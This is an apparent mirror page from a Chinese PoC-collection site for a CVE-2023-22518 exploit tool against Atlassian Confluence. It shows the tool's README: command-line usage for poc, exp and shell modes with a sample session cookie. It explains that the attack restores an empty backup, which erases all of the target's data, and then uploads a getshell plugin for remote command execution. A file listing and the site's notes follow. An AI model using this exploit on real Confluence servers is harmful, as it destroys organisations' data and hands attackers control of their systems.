POC详情: d6e0712ce30fda99dce82daafaeb2d4c7346a513

来源
关联漏洞
标题: Atlassian Confluence Data Center 和 Confluence Server 安全漏洞 (CVE-2023-22518)
描述:Atlassian Confluence Server是澳大利亚Atlassian公司的一套具有企业知识管理功能,并支持用于构建企业WiKi的协同软件的服务器版本。 Atlassian Confluence Data Center 和 Confluence Server存在安全漏洞,该漏洞源于授权管理不当。
描述
Confluence CVE-2023-22518
介绍
# CVE-2023-22518

Confluence CVE-2023-22518

## Description

+ `xmlexport-20231127-071916-1.zip`:Confluence 空备份文件,**空备份会导致恢复后丢失全部数据**!!!
+ 备份文件可自行替换,置于脚本同级目录即可
+ `shellplug.jar`:getshell 插件,来源于:https://github.com/youcannotseemeagain/CVE-2023-22515_RCE
+ 导出备份文件的接口`/setup/setup-restore.action`,需要登录且有权限

## Usage

```powershell
python .\CVE-2023-22518.py -h                                                             


     ██████╗██╗   ██╗███████╗    ██████╗  ██████╗ ██████╗ ██████╗       ██████╗ ██████╗ ███████╗ ██╗ █████╗
    ██╔════╝██║   ██║██╔════╝    ╚════██╗██╔═████╗╚════██╗╚════██╗      ╚════██╗╚════██╗██╔════╝███║██╔══██╗
    ██║     ██║   ██║█████╗█████╗ █████╔╝██║██╔██║ █████╔╝ █████╔╝█████╗ █████╔╝ █████╔╝███████╗╚██║╚█████╔╝
    ██║     ╚██╗ ██╔╝██╔══╝╚════╝██╔═══╝ ████╔╝██║██╔═══╝  ╚═══██╗╚════╝██╔═══╝ ██╔═══╝ ╚════██║ ██║██╔══██╗
    ╚██████╗ ╚████╔╝ ███████╗    ███████╗╚██████╔╝███████╗██████╔╝      ███████╗███████╗███████║ ██║╚█████╔╝
     ╚═════╝  ╚═══╝  ╚══════╝    ╚══════╝ ╚═════╝ ╚══════╝╚═════╝       ╚══════╝╚══════╝╚══════╝ ╚═╝ ╚════╝

                                                                            @Auth: C1ph3rX13
                                                                            @Blog: https://c1ph3rx13.github.io
                                                                            @Note: 代码仅供学习使用,请勿用于其他用途


optional arguments:
  -h, --help            show this help message and exit
  -t TARGET, --target TARGET
                        Target Url
  -id JSESSIONID, --jsessionid JSESSIONID
                        JSESSIONID
  --timeout TIMEOUT     Timeout (Default: 30 Seconds)
  --proxy PROXY         Proxy

```

### POC

```powershell
python .\CVE-2023-22518.py poc -t http://IP:Port
```

![img](https://raw.githubusercontent.com/C1ph3rX13/CVE-2023-22518/main/images/CVE-2023-22518-poc.png)

### Exp

```powershell
Cookie:
JSESSIONID=754BEE347CD53ECB342B74CFFDD33B4D

python .\CVE-2023-22518.py exp -t http://IP:Port -id 754BEE347CD53ECB342B74CFFDD33B4D
```

![img](https://raw.githubusercontent.com/C1ph3rX13/CVE-2023-22518/main/images/CVE-2023-22518-exp.png)

### Shell

```powershell
Cookie:
JSESSIONID=754BEE347CD53ECB342B74CFFDD33B4D

python .\CVE-2023-22518.py shell -t http://IP:Port -id 754BEE347CD53ECB342B74CFFDD33B4D
```

![img](https://raw.githubusercontent.com/C1ph3rX13/CVE-2023-22518/main/images/CVE-2023-22518-shell.png)

## Thanks

https://github.com/ForceFledgling/CVE-2023-22518

https://github.com/sanjai-AK47/CVE-2023-22518

文件快照

[4.0K] /data/pocs/d6e0712ce30fda99dce82daafaeb2d4c7346a513 ├── [8.5K] CVE-2023-22518.py ├── [ 272] docker-compose.yml ├── [4.0K] images │   ├── [ 59K] CVE-2023-22518-exp.png │   ├── [ 40K] CVE-2023-22518-poc.png │   └── [ 88K] CVE-2023-22518-shell.png ├── [1.0K] LICENSE ├── [3.7K] README.md ├── [9.3K] shellplug.jar └── [847K] xmlexport-20231127-071916-1.zip 1 directory, 9 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。